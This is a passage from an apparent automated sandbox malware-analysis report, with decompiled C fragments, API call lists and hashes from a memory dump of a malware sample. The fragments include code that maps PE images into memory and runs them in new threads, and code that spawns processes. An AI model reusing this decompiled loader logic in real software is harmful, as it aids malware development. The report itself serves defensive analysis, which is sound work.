					 *((intOrPtr*)(_t33 + 4)) =  *((intOrPtr*)(_t31 + 4));
					_t4 = _t33 + 0x10; // 0x10
					_t29 = _t4;
					 *(_t33 + 8) = _t29;
					 *(_t33 + 0xc) =  *(_t31 + 0xc);
					memcpy(_t29,  *(_t31 + 8),  *(_t31 + 0xc));
					_t32 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t32 == 0) {
						L5:
						return HeapFree(GetProcessHeap(), 0, _t33);
					}
					 *(_t32 + 4) =  *_t33;
					_t22 = CreateThread(0, 0, E0005A3A0, _t33, 0, 0);
					 *(_t32 + 8) = _t22;
					if(_t22 == 0) {
						HeapFree(GetProcessHeap(), 0, _t32);
						goto L5;
					}
					_t25 =  *0x5cbd4; // 0x0
					 *_t32 = _t25;
					 *0x5cbd4 = _t32;
					return _t25;
				}
			}

0x0005a692
0x0005a6a4
0x0005a6aa
0x0005a6ae
0x0005a743
0x0005a6b4
0x0005a6b6
0x0005a6bb
0x0005a6be
0x0005a6be
0x0005a6c1
0x0005a6c7
0x0005a6d1
0x0005a6eb
0x0005a6ef
0x0005a731
0x00000000
0x0005a73b
0x0005a701
0x0005a704
0x0005a70a
0x0005a70f
0x0005a72b
0x00000000
0x0005a72b
0x0005a711
0x0005a716
0x0005a718
0x0005a720
0x0005a720

APIs

GetProcessHeap.KERNEL32(00000008,?,?,00000000,0005A87A,?,000DBBA0,?,?,?,?,?,?,?,00058F9A), ref: 0005A69D
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0005A6A4
memcpy.NTDLL(00000010,?,?,?,00000000,0005A87A,?,000DBBA0,?,?,?,?,?,?,?,00058F9A), ref: 0005A6D1
GetProcessHeap.KERNEL32(00000008,0000000C,?,000DBBA0,?,?,?,?,?,?,?,00058F9A), ref: 0005A6DE
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 0005A6E5
CreateThread.KERNEL32(00000000,00000000,0005A3A0,00000000,00000000,00000000), ref: 0005A704
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,00058F9A), ref: 0005A724
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,00058F9A), ref: 0005A72B
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,00058F9A), ref: 0005A734
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,00058F9A), ref: 0005A73B

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree$CreateThreadmemcpy
String ID:
API String ID: 1978610079-0
Opcode ID: 916b9d63ea4af8b12a45ecfdb7afd85ed5aee67b8a77fd75e95f1549e2b78076
Instruction ID: 510517a090e37047e04034d39e6c50fa16b9f3341b67d9b8dff84cf1126a0a5b
Opcode Fuzzy Hash: 916b9d63ea4af8b12a45ecfdb7afd85ed5aee67b8a77fd75e95f1549e2b78076
Instruction Fuzzy Hash: 60214775600B01AFF7209F69EC09F47BBA4FB4A712F108519FA5AC6291CB34A454CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00051C50, Relevance: 10.6, APIs: 7, Instructions: 97
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00051C50(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v524;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t31;
				int _t32;
				void* _t35;
				intOrPtr* _t36;

				_t35 = 0;
				_v12 = 0x200;
				_t36 = __ecx;
				_t31 = __edx;
				_v8 = __edx;
				memset(__ecx, 0, 0x14);
				_push( &_v12);
				_push( &_v524);
				_push(0);
				if( *0x5c0cc() >= 0) {
					_t32 = MultiByteToWideChar(0, 0,  &_v524, 0xffffffff, 0, 0);
					if(_t32 != 0) {
						_t35 = RtlAllocateHeap(GetProcessHeap(), 8, _t32 + _t32);
						if(_t35 != 0) {
							MultiByteToWideChar(0, 0,  &_v524, 0xffffffff, _t35, _t32);
						}
					}
					_t31 = _v8;
				}
				 *_t36 =  *0x5c244(_t35, 0, 0, 0, 0);
				HeapFree(GetProcessHeap(), 0, _t35);
				_t19 =  *_t36;
				if(_t19 == 0) {
					L9:
					return 0;
				} else {
					_t21 =  *0x5c254(_t19, _t31, _a4, 0, 0, 3, 0, 0);
					 *((intOrPtr*)(_t36 + 4)) = _t21;
					if(_t21 == 0) {
						 *0x5c234( *_t36);
						goto L9;
					} else {
						 *((intOrPtr*)(_t36 + 0xc)) = 3;
						return 1;
					}
				}
			}

0x00051c5e
0x00051c60
0x00051c67
0x00051c69
0x00051c6d
0x00051c70
0x00051c7c
0x00051c83
0x00051c84
0x00051c8d
0x00051ca2
0x00051ca6
0x00051cbb
0x00051cbf
0x00051cd0
0x00051cd0
0x00051cbf
0x00051cd6
0x00051cd6
0x00051ceb
0x00051cf4
0x00051cfa
0x00051cfe
0x00051d39
0x00051d3f
0x00051d00
0x00051d0f
0x00051d15
0x00051d1a
0x00051d31
0x00000000
0x00051d1d
0x00051d1d
0x00051d2e
0x00051d2e
0x00051d1a

APIs

memset.NTDLL ref: 00051C70
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00051C9C
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00051CAE
RtlAllocateHeap.NTDLL(00000000), ref: 00051CB5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00051CD0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00051CED
HeapFree.KERNEL32(00000000), ref: 00051CF4

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$ByteCharMultiProcessWide$AllocateFreememset
String ID:
API String ID: 4040929015-0
Opcode ID: 75c880f7f71838903c485a987175698350aad805a3365bf9817ae8d85185c448
Instruction ID: 36ff51ae94ebc216fb9630c20a5f979ee421d40e3cc613fd41bd37793207dbfe
Opcode Fuzzy Hash: 75c880f7f71838903c485a987175698350aad805a3365bf9817ae8d85185c448
Instruction Fuzzy Hash: 7631D031640304BFF7204FA5AC4CFABBBBCEB86B12F100129BA14D61D0DB789944CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00059F80, Relevance: 9.2, APIs: 6, Instructions: 199
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00059F80(intOrPtr* __ecx, unsigned int* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				unsigned int _t37;
				unsigned int _t38;
				unsigned int _t39;
				unsigned int _t40;
				unsigned int _t41;
				long _t50;
				signed char _t61;
				signed char _t63;
				signed char _t65;
				signed char _t67;
				signed char _t69;
				intOrPtr _t71;
				intOrPtr* _t72;
				int _t73;
				int _t74;
				int _t75;
				intOrPtr _t77;
				signed char _t78;
				signed char _t80;
				signed char _t82;
				signed char _t84;
				signed char _t86;
				intOrPtr _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				int _t93;
				signed char* _t94;
				void* _t95;
				intOrPtr _t96;
				char* _t99;
				signed char* _t100;
				signed char* _t101;
				void* _t102;
				char* _t103;
				signed char* _t104;
				void* _t105;
				char* _t106;
				signed char* _t107;
				void* _t108;
				char* _t109;
				signed char* _t110;

				_t94 = __edx;
				_v16 = __ecx;
				_t96 = 1;
				_v12 = 1;
				_t37 =  *__edx;
				if(_t37 > 0x7f) {
					do {
						_t37 = _t37 >> 7;
						_t96 = _t96 + 1;
					} while (_t37 > 0x7f);
					_v12 = _t96;
				}
				_t4 =  &(_t94[8]); // 0x0
				_t38 =  *_t4;
				_t77 = 1;
				while(_t38 > 0x7f) {
					_t38 = _t38 >> 7;
					_t77 = _t77 + 1;
				}
				_t5 =  &(_t94[0x18]); // 0x0
				_t39 =  *_t5;
				_t89 = 1;
				while(_t39 > 0x7f) {
					_t39 = _t39 >> 7;
					_t89 = _t89 + 1;
				}
				_t6 =  &(_t94[0x20]); // 0x0
				_t40 =  *_t6;
				_t71 = 1;
				while(_t40 > 0x7f) {
					_t40 = _t40 >> 7;
					_t71 = _t71 + 1;
				}
				_t7 =  &(_t94[0x28]); // 0x0
				_t41 =  *_t7;
				_v8 = 1;
				while(_t41 > 0x7f) {
					_v8 = _v8 + 1;
					_t41 = _t41 >> 7;
				}
				_t11 =  &(_t94[0x28]); // 0x0
				_t12 =  &(_t94[0x20]); // 0x0
				_t13 =  &(_t94[0x18]); // 0x0
				_t14 =  &(_t94[8]); // 0x0
				_t72 = _v16;
				_t50 =  *_t11 +  *_t12 +  *_t13 +  *_t14 + _v8 + _t71 + _t89 + _t77 + _v12 + 0xf;
				 *(_t72 + 4) = _t50;
				_t99 = RtlAllocateHeap(GetProcessHeap(), 0, _t50);
				 *_t72 = _t99;
				if(_t99 != 0) {
					 *_t99 = 8;
					_t100 = _t99 + 1;
					_t78 =  *_t94;
					while(_t78 > 0x7f) {
						_t69 = _t78;
						_t78 = _t78 >> 7;
						 *_t100 = _t69 | 0x00000080;
						_t100 =  &(_t100[1]);
					}
					 *_t100 = _t78 & 0x0000007f;
					_t100[1] = 0x12;
					_t101 =  &(_t100[2]);
					_t20 =  &(_t94[8]); // 0x0
					_t73 =  *_t20;
					_t80 = _t73;
					_t21 =  &(_t94[4]); // 0x0
					_t90 =  *_t21;
					if(_t73 > 0x7f) {
						do {
							_t67 = _t80;
							_t80 = _t80 >> 7;
							 *_t101 = _t67 | 0x00000080;
							_t101 =  &(_t101[1]);
						} while (_t80 > 0x7f);
					}
					 *_t101 = _t80 & 0x0000007f;
					_t102 =  &(_t101[1]);
					memcpy(_t102, _t90, _t73);
					_t103 = _t102 + _t73;
					 *_t103 = 0x1d;
					_t22 =  &(_t94[0xc]); // 0x0
					 *(_t103 + 1) =  *_t22;
					 *((char*)(_t103 + 5)) = 0x25;
					_t25 =  &(_t94[0x10]); // 0x0
					 *(_t103 + 6) =  *_t25;
					 *((char*)(_t103 + 0xa)) = 0x2a;
					_t104 = _t103 + 0xb;
					_t28 =  &(_t94[0x18]); // 0x0
					_t74 =  *_t28;
					_t82 = _t74;
					_t29 =  &(_t94[0x14]); // 0x0
					_t91 =  *_t29;
					if(_t74 > 0x7f) {
						do {
							_t65 = _t82;
							_t82 = _t82 >> 7;
							 *_t104 = _t65 | 0x00000080;
							_t104 =  &(_t104[1]);
						} while (_t82 > 0x7f);
					}
					 *_t104 = _t82 & 0x0000007f;
					_t105 =  &(_t104[1]);
					memcpy(_t105, _t91, _t74);
					_t106 = _t105 + _t74;
					 *_t106 = 0x32;
					_t107 = _t106 + 1;
					_t30 =  &(_t94[0x20]); // 0x0
					_t75 =  *_t30;
					_t84 = _t75;
					_t31 =  &(_t94[0x1c]); // 0x0
					_t92 =  *_t31;
					if(_t75 > 0x7f) {
						do {
							_t63 = _t84;
							_t84 = _t84 >> 7;
							 *_t107 = _t63 | 0x00000080;
							_t107 =  &(_t107[1]);
						} while (_t84 > 0x7f);
					}
					 *_t107 = _t84 & 0x0000007f;
					_t108 =  &(_t107[1]);
					memcpy(_t108, _t92, _t75);
					_t109 = _t108 + _t75;
					 *_t109 = 0x3a;
					_t110 = _t109 + 1;
					_t32 =  &(_t94[0x28]); // 0x0
					_t93 =  *_t32;
					_t86 = _t93;
					_t33 =  &(_t94[0x24]); // 0x0
					_t95 =  *_t33;
					if(_t93 > 0x7f) {
						do {
							_t61 = _t86;
							_t86 = _t86 >> 7;
							 *_t110 = _t61 | 0x00000080;
							_t110 =  &(_t110[1]);
						} while (_t86 > 0x7f);
					}
					 *_t110 = _t86 & 0x0000007f;
					memcpy( &(_t110[1]), _t95, _t93);
					_t72 = _v16;
				}
				return 0 |  *_t72 != 0x00000000;
			}

0x00059f89
0x00059f8b
0x00059f8e
0x00059f93
0x00059f96
0x00059f9b
0x00059fa0
0x00059fa0
0x00059fa3
0x00059fa4
0x00059fa9
0x00059fa9
0x00059fac
0x00059fac
0x00059faf
0x00059fb7
0x00059fc0
0x00059fc3
0x00059fc4
0x00059fc9
0x00059fc9
0x00059fcc
0x00059fd4
0x00059fd6
0x00059fd9
0x00059fda
0x00059fdf
0x00059fdf
0x00059fe2
0x00059fea
0x00059ff0
0x00059ff3
0x00059ff4
0x00059ff9
0x00059ff9
0x00059ffc
0x0005a006
0x0005a010
0x0005a013
0x0005a016
0x0005a01b
0x0005a01e
0x0005a021
0x0005a024
0x0005a02f
0x0005a039
0x0005a03e
0x0005a04e
0x0005a050
0x0005a054
0x0005a05a
0x0005a05d
0x0005a05e
0x0005a063
0x0005a065
0x0005a067
0x0005a06c
0x0005a06e
0x0005a06f
0x0005a077
0x0005a079
0x0005a07d
0x0005a080
0x0005a080
0x0005a083
0x0005a085
0x0005a085
0x0005a08b
0x0005a090
0x0005a090
0x0005a092
0x0005a097
0x0005a099
0x0005a09a
0x0005a090
0x0005a0a3
0x0005a0a5
0x0005a0a8
0x0005a0ae
0x0005a0b3
0x0005a0b6
0x0005a0b9
0x0005a0bc
0x0005a0c0
0x0005a0c3
0x0005a0c6
0x0005a0ca
0x0005a0cd
0x0005a0cd
0x0005a0d0
0x0005a0d2
0x0005a0d2
0x0005a0d8
0x0005a0e0
0x0005a0e0
0x0005a0e2
0x0005a0e7
0x0005a0e9
0x0005a0ea
0x0005a0e0
0x0005a0f3
0x0005a0f5
0x0005a0f8
0x0005a0fe
0x0005a103
0x0005a106
0x0005a107
0x0005a107
0x0005a10a
0x0005a10c
0x0005a10c
0x0005a112
0x0005a114
0x0005a114
0x0005a116
0x0005a11b
0x0005a11d
0x0005a11e
0x0005a114
0x0005a127
0x0005a129
0x0005a12c
0x0005a132
0x0005a137
0x0005a13a
0x0005a13b
0x0005a13b
0x0005a13e
0x0005a140
0x0005a140
0x0005a146
0x0005a148
0x0005a148
0x0005a14a
0x0005a14f
0x0005a151
0x0005a152
0x0005a148
0x0005a15b
0x0005a160
0x0005a166
0x0005a169
0x0005a179

APIs

GetProcessHeap.KERNEL32(00000000,00000001,?,000DBBA0), ref: 0005A041
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 0005A048
memcpy.NTDLL(00000000,00000000,00000000,?,000DBBA0), ref: 0005A0A8

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcessmemcpy
String ID:
API String ID: 1874444438-0
Opcode ID: d6ebddcabcc7f7c99c7e66dbd40ac3a05059edb7e032fc91ebdc031a927b7806
Instruction ID: 1b0f804cb6545a8732e6462b4d1d09afa03fe604baf2bb0ca956d6d98e1174a7
Opcode Fuzzy Hash: d6ebddcabcc7f7c99c7e66dbd40ac3a05059edb7e032fc91ebdc031a927b7806
Instruction Fuzzy Hash: 7061C7709006519FE7248F19C48075BFBE4FF2A711F28466DEC8987B42C324A99ADBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00058990, Relevance: 9.1, APIs: 6, Instructions: 95
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00058990(signed char __ecx, void* __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed char _v16;
				intOrPtr _v20;
				void* _v24;
				char _v28;
				signed char _t25;
				void* _t31;
				intOrPtr _t34;
				void* _t36;
				void _t38;
				signed char _t39;
				signed char _t41;
				signed int _t47;
				intOrPtr _t50;
				void* _t51;
				signed char _t52;

				_t52 = __ecx;
				_t50 = __ecx + __edx;
				_v8 = _t50;
				while(1) {
					_t47 = 0;
					_t41 = 0;
					_v12 = 0;
					_t39 = 0x80;
					if(_t52 >= _t50) {
						goto L6;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t39 =  *_t52;
						_t52 = _t52 + 1;
						_t47 = _t47 | (_t39 & 0x7f) << _t41;
						if(_t39 >= 0) {
							break;
						}
						_t41 = _t41 + 7;
						if(_t52 < _t50) {
							continue;
						}
						break;
					}
					_v12 = _t47;
					L6:
					_t25 =  !((_t39 & 0x000000ff) >> 7);
					if((_t25 & 0x00000001) != 0) {
						_t25 = _t47 + _t52;
						if(_t25 <= _t50) {
							_v16 = _t52;
							_t52 = _t25;
							_t25 = E000587C0( &_v16,  &_v28);
							if(_t25 != 0) {
								_t51 = RtlAllocateHeap(GetProcessHeap(), 8, 0x14);
								if(_t51 == 0) {
									L1:
									_t50 = _v8;
									continue;
								} else {
									_t31 = E00051F40(_v24, _v20);
									 *(_t51 + 8) = _t31;
									if(_t31 == 0) {
										L15:
										HeapFree(GetProcessHeap(), 0, _t51);
										goto L1;
									} else {
										_t34 = _t31 +  *((intOrPtr*)( *((intOrPtr*)(_t31 + 0x3c)) + _t31 + 0x28));
										 *((intOrPtr*)(_t51 + 0xc)) = _t34;
										if(_t34 == 0) {
											L14:
											VirtualFree( *(_t51 + 8), 0, 0x8000);
											goto L15;
										} else {
											_t36 = CreateThread(0, 0, E00058880, _t51, 0, 0);
											 *(_t51 + 0x10) = _t36;
											if(_t36 == 0) {
												goto L14;
											} else {
												 *((intOrPtr*)(_t51 + 4)) = _v28;
												_t38 =  *0x5c274; // 0x0
												 *_t51 = _t38;
												 *0x5c274 = _t51;
												goto L1;
											}
										}
									}
								}
								L17:
							}
						}
					}
					return _t25;
					goto L17;
				}
			}

0x00058998
0x0005899b
0x0005899e
0x000589a6
0x000589a6
0x000589a8
0x000589aa
0x000589ad
0x000589b1
0x00000000
0x00000000
0x00000000
0x00000000
0x000589b3
0x000589b3
0x000589b3
0x000589b5
0x000589be
0x000589c2
0x00000000
0x00000000
0x000589c4
0x000589c9
0x00000000
0x00000000
0x00000000
0x000589c9
0x000589cb
0x000589ce
0x000589d4
0x000589d8
0x000589de
0x000589e3
0x000589e9
0x000589f2
0x000589f4
0x000589fb
0x00058a12
0x00058a16
0x000589a3
0x000589a3
0x00000000
0x00058a18
0x00058a1e
0x00058a23
0x00058a28
0x00058a7b
0x00058a85
0x00000000
0x00058a2a
0x00058a31
0x00058a33
0x00058a36
0x00058a6b
0x00058a75
0x00000000
0x00058a38
0x00058a46
0x00058a4c
0x00058a51
0x00000000
0x00058a53
0x00058a56
0x00058a59
0x00058a5e
0x00058a60
0x00000000
0x00058a60
0x00058a51
0x00058a36
0x00058a28
0x00000000
0x00058a16
0x000589fb
0x000589e3
0x00058a96
0x00000000
0x00058a96

APIs

GetProcessHeap.KERNEL32(00000008,00000014,?,000DBBA0,?,?,?,?,?,?,?,00058F82), ref: 00058A05
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 00058A0C
CreateThread.KERNEL32(00000000,00000000,00058880,00000000,00000000,00000000), ref: 00058A46
VirtualFree.KERNEL32(?,00000000,00008000,?,000DBBA0,?,?,?,?,?,?,?,00058F82), ref: 00058A75
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,?,?,?,?,?,?,00058F82), ref: 00058A7E
HeapFree.KERNEL32(00000000,?,000DBBA0,?,?,?,?,?,?,?,00058F82), ref: 00058A85

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$AllocateCreateThreadVirtual
String ID:
API String ID: 1073023709-0
Opcode ID: e513463dd3f7e308ecab5b9eed6cb12550e79ca099222a3e743f018fae6ac767
Instruction ID: bad2da0c05c47bb0a9829c398c9a98018aec83f2bd8b27df5b7f8e00e696b0f4
Opcode Fuzzy Hash: e513463dd3f7e308ecab5b9eed6cb12550e79ca099222a3e743f018fae6ac767
Instruction Fuzzy Hash: D531DE71A40B02AFFB24DB69CC45BABB7E4EB85302F248125ED41E7281EF70D804CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00052180, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80
memoryprocessCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E00052180(WCHAR* __ecx, void* _a4, struct _PROCESS_INFORMATION* _a8) {
				char _v8;
				struct _STARTUPINFOW _v76;
				int _t29;
				WCHAR* _t31;
				int _t35;
				void* _t36;

				_t35 = 0;
				_t31 = __ecx;
				memset( &_v76, 0, 0x44);
				_t36 = _a4;
				_v76.cb = 0x44;
				if(_t36 == 0) {
					return CreateProcessW(0, _t31, 0, 0, 0, 0, 0, 0,  &_v76, _a8);
				} else {
					_t5 = _t35 + 0x10; // 0x10
					E00051830(0x51030, _t5, 0x47deb7fb,  &_a4);
					_v76.lpDesktop = _a4;
					_push(0);
					_push(_t36);
					_push( &_v8);
					if( *0x5c21c() != 0) {
						_t29 =  *0x5c04c(_t36, 0, _t31, 0, 0, 0, 0x400, _v8, 0,  &_v76, _a8);
						_t35 = _t29;
						 *0x5c220(_v8);
					}
					HeapFree(GetProcessHeap(), 0, _a4);
					return _t35;
				}
			}

0x0005218b
0x00052192
0x00052194
0x0005219a
0x000521a0
0x000521a9
0x0005223e
0x000521ab
0x000521b9
0x000521bc
0x000521c7
0x000521cd
0x000521ce
0x000521cf
0x000521d8
0x000521f0
0x000521f9
0x000521fb
0x000521fb
0x0005220d
0x0005221b
0x0005221b

APIs

memset.NTDLL ref: 00052194
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,0005A52C), ref: 00052232

Part of subcall function 00051830: GetProcessHeap.KERNEL32(00000008,00059F6B,00000000,00000000,00051004,?,000515F4,4DBAC13F,00059F6B,?,00000000), ref: 00051844
Part of subcall function 00051830: RtlAllocateHeap.NTDLL(00000000,?,000515F4), ref: 0005184B

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00052206
HeapFree.KERNEL32(00000000), ref: 0005220D

Strings

D, xrefs: 000521A0

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCreateFreememset
String ID: D
API String ID: 3667606640-2746444292
Opcode ID: 8483f9e80e7d5bc70037b056b6890e80f33858033db3475587aebb1f2a810b00
Instruction ID: 4d5d3d9aa066e9c5b31a5d19f3ed3d7f58d87ee2ecd64e76aa783bbda7680527
Opcode Fuzzy Hash: 8483f9e80e7d5bc70037b056b6890e80f33858033db3475587aebb1f2a810b00
Instruction Fuzzy Hash: 2E114A76600308BFEB209B95EC48EDF7F7CEF85756F044025FE0896240DA359A55CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 000523F0, Relevance: 7.6, APIs: 5, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?), ref: 00052422
RtlAllocateHeap.NTDLL(00000000), ref: 00052429
memcpy.NTDLL(00058583,?,?), ref: 00052467
GetProcessHeap.KERNEL32(00000000,00058583), ref: 0005250A
HeapFree.KERNEL32(00000000), ref: 00052511

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememcpy
String ID:
API String ID: 461410222-0
Opcode ID: 7b09742506ccc3f22c13c44ff133b4cf4bf89bf3a3ba8c4233ded2f9cc294650
Instruction ID: b1cf62a44f45f5aa8736e12d655cb59716793c980fb19333892f5b6207a58ab9
Opcode Fuzzy Hash: 7b09742506ccc3f22c13c44ff133b4cf4bf89bf3a3ba8c4233ded2f9cc294650
Instruction Fuzzy Hash: 8D415A71900309EFFB118FA4DC48FABBBB9EF45302F144069E905E72A1E7359A44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00052530, Relevance: 7.6, APIs: 5, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,00058644,?), ref: 0005256D
RtlAllocateHeap.NTDLL(00000000), ref: 00052574
memcpy.NTDLL(00058644,?,?), ref: 000525AE
GetProcessHeap.KERNEL32(00000000,00058644), ref: 0005260C
HeapFree.KERNEL32(00000000), ref: 00052613

Memory Dump Source

Source File: 00000001.00000002.195074654.0000000000051000.00000020.00020000.sdmp, Offset: 00050000, based on PE: true

Associated: 00000001.00000002.195070214.0000000000050000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195082384.000000000005B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.195086200.000000000005C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.195089962.000000000005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_50000_malware.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememcpy
String ID:
API String ID: 461410222-0
Opcode ID: 2efde6da88a7cdba40f03da4d82c0feb7ed31ff1095c1786c3dfe81b185a7438
Instruction ID: 1de63c23228a2a0d036b0d57153d1d14da4861b17bda5dc54819b3aca844ebd7
Opcode Fuzzy Hash: 2efde6da88a7cdba40f03da4d82c0feb7ed31ff1095c1786c3dfe81b185a7438
Instruction Fuzzy Hash: 93316B71640305AFFB118FA4EC89F9BBBA9FF09706F100161F905D61A0E7759954DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00058290, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00058290(int* __ecx, signed int _a8) {
				intOrPtr _t66;
				int* _t88;
				signed int _t89;
				void* _t90;

				_t89 = _a8;
				_t88 = __ecx;
				 *__ecx = 0;
				__ecx[1] = 0;
				__ecx[2] = _t89;
				__ecx[3] = (0x55555556 * ((_t89 & 0x00000fff) + 2) >> 0x20 >> 0x1f) + (0x55555556 * ((_t89 & 0x00000fff) + 2) >> 0x20) + 1;
				__ecx[5] = _t89 >> 0x0000000e & 0x00000001;
				__ecx[4] = (0x55555556 * ((_t89 >> 0x00000002 & 0x000003ff) + 2) >> 0x20 >> 0x1f) + 1 + (0x55555556 * ((_t89 >> 0x00000002 & 0x000003ff) + 2) >> 0x20);
				if((_t89 & 0x00008000) == 0) {
					_t17 = _t88 + 0x29272; // 0x29272
					memset(_t17, 0, 0x10000);
					_t90 = _t90 + 0xc;
				}
				_t18 = _t88 + 0x9273; // 0x9273
				 *(_t88 + 0x44) = 0;
				 *((intOrPtr*)(_t88 + 0x28)) = _t18;
				_t21 = _t88 + 0x9272; // 0x9272
				 *((intOrPtr*)(_t88 + 0x2c)) = _t21;
				_t23 = _t88 + 0x39272; // 0x39272
				_t66 = _t23;
				 *((intOrPtr*)(_t88 + 0x30)) = _t66;
				 *((intOrPtr*)(_t88 + 0x34)) = _t66;
				_t26 = _t88 + 0x8192; // 0x8192
				 *(_t88 + 0x40) = 0;
				 *(_t88 + 0x3c) = 0;
				 *(_t88 + 0x24) = 0;
				 *(_t88 + 0x20) = 0;
				 *(_t88 + 0x1c) = 0;
				 *(_t88 + 0x68) = 0;
				 *(_t88 + 0x48) = 0;
				 *(_t88 + 0x64) = 0;
				 *(_t88 + 0x60) = 0;
				 *(_t88 + 0x5c) = 0;
				 *(_t88 + 0x58) = 0;
				 *((intOrPtr*)(_t88 + 0x38)) = 8;
				 *(_t88 + 0x6c) = 0;
				 *(_t88 + 0x54) = 0;
				 *(_t88 + 0x50) = 0;
				 *(_t88 + 0x4c) = 0;
